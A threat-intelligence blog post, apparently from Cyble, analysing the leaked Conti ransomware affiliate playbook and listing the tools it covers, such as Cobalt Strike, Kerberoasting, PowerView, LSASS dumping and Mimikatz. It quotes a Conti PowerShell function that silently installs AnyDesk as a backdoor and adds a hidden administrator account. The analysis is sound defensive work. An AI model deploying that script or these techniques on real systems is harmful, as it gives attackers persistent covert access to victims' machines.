An ex-affiliate of Conti Ransomware released training material used by the Conti core team to train their affiliates to conduct ransomware attacks. We have a screenshot showcasing this below.
The Threat Actor (TA) claimed that they posted it because Conti did not fully pay them for their work. The ex-affiliate claims to have received only $1500 for all the work they have done for Conti.
Below is the screenshot for claims made by TA.
In June 2021, Conti had published a post on one of the cybercrime forums where they seemed to be recruiting penetration testers.
Upon analyzing the document, we found that the basic MO of the group is simple – the core team manages the malware and maintains the onion websites. The recruited affiliates, meanwhile, are tasked with finding vulnerable networks and encrypting them. Conti also provides training materials to their affiliates which include step-by-step techniques to hack networks and maintain access.
Below is the screenshot of all the images and files leaked by the associates.
We have compiled a list of tools that Conti has created training materials for:
- Cobalt Strike
Cobalt Strike is a security tool created with the intent of helping penetration testers or red teamers conduct security assessments. Recently, however, cybercriminals have started using this tool because of its rich features and functionalities. The features of this tool range from establishing an initial foothold and initiating a lateral movement to creating persistence on infected systems. Generally, cybercriminals use the cracked version of this tool.
Similarly, here the Conti Group has used the cracked version.
- alias.rc (custom Metasploit resource script file)
The use case of this script is to generate an alias for various auxiliary and post-exploitation modules available in the Metasploit tool. The below figure shows that various aliases have been created in the Metasploit tool.
- Invoke-Kerberoast.ps1
“Invoke-Kerberoast” is a tool developed by harmj0y; this tool has been created to launch Kerberoast attacks. The Kerberoast attack requests the domain controller to retrieve the list of Service Principal Names (SPNs) associated with service accounts created for various services such as SQL.
Once the attacker has the list of SPNs, the attacker can request a Ticket Granting Service (TGS) ticket. Once the TGS ticket has been received, the attacker can use various techniques to export the TGS from the operating system’s memory and perform an offline password cracking method to retrieve the plain text password.
Invoke-Kerberoast PowerShell is an all-in-one tool with all the capabilities from querying to domain control for SPNs and exporting the TGS hash data.
- AdFind
AdFind is a post-exploitation tool. It is used when the attacker has a foothold in the client machine that is part of a domain controller network. Using this tool, the attacker can get the details like Active Directory User List, Computers List, Organizational Unit, etc.
- PowerView
PowerView is another post-exploitation tool. This tool can be used once the attacker has a foothold in the domain controller network. Leveraging this tool, the attacker can perform multiple tasks, including enumerating the domain controller and extracting the details—E.g., SPN, domain computers, policies, forest, etc.
- RouterScan
RouterScan is a scanning tool used to identify various router devices in a provided range of IPs. This tool can show details like the device type/information, Extended Service Set Identifier (ESSID), Basic Service Set Identifiers (BSSID), etc. Additionally, this tool also tries to find login/password from a standard list already present in this tool.
- PowerUpSQL
PowerUPSQL is yet another post-exploitation tool. This tool is created with the intent to enumerate the SQL Services. One example is executing a system command from a target MSSQL server leveraging the xp_cmdshell function present in MSSQL Service.
- NGROK
In one of the documents named “RDP NGROK.txt,” the attacker has described the method to access the victim machine over the internet via the Remote Desktop Protocol (RDP) port with the help of the NGROK service.
- rundll32.exe
“rundll32.exe” is a Microsoft Windows operating system component. Using “rundll32.exe”, the attacker can call the MiniDump API function (Application Programming Interface) from the comsvcs.dll library to generate the LSASS.exe process dump. Later, this dump can extract information such as Windows operating system hashes and passwords utilizing tools like Mimikatz.
- AnyDesk
The attacker used the below PowerShell code to use AnyDesk as a backdoor. From a remote machine, the attacker can control the victim machine.
Function AnyDesk {
mkdir "C:\ProgramData\AnyDesk"
# Download AnyDesk
$clnt = new-object System.Net.WebClient
$url = "http:[//]download[.]anydesk.com/AnyDesk.exe"
$file = "C:\ProgramData\AnyDesk.exe"
$clnt.DownloadFile($url,$file)
cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
net user oldadministrator "qc69t4B#Z0kE3" /add
net localgroup Administrators oldadministrator /ADD
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
}
Table 1 PowerShell Code to Install AnyDesk
- TOR
Use of TOR as SOCKS proxy to hide and maintain anonymity.
- Metasploit
Metasploit is a security tool used by penetration testers, exploit developers, red teamers, etc. The Metasploit tool provides a platform containing many exploits related to various popular services and applications. Additionally, it also holds payloads and auxiliary modules for various other security assessment purposes.
- Additional script/tools/techniques used by Conti
| Sr. No | Script/Tools/Techniques | Description |
| 1 | script.sh | Sort details from ad_computers.txt and ad_user.txt generated by AdFind.exe |
| 2 | Hash in ntds.dit | Extracting Hash from ntds.dit file |
| 3 | netscan | Scan range of IPs to find Shared Folder |
| 4 | p.bat | Iterate through the domain.txt file and ping every IP to find which one is live. |
| 5 | sqlcmd Utility | The utility is used to query SQL commands remotely |
| 6 | Net user | To enumerate local users and domain users |
| 7 | wmic | Remotely connect to the machine and execute various commands |
| 8 | Armitage | A GUI for Metasploit tool |
| 9 | Mimikatz | Extracts the hashes and passwords from the memory, performs DCSync, etc. |
Table 2 Misc Tools Which are Part Conti PlayBook
About Us:
Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the Darkweb. Its prime focus is to provide organizations with real-time visibility to their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Start-ups To Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit https://cyble.com.
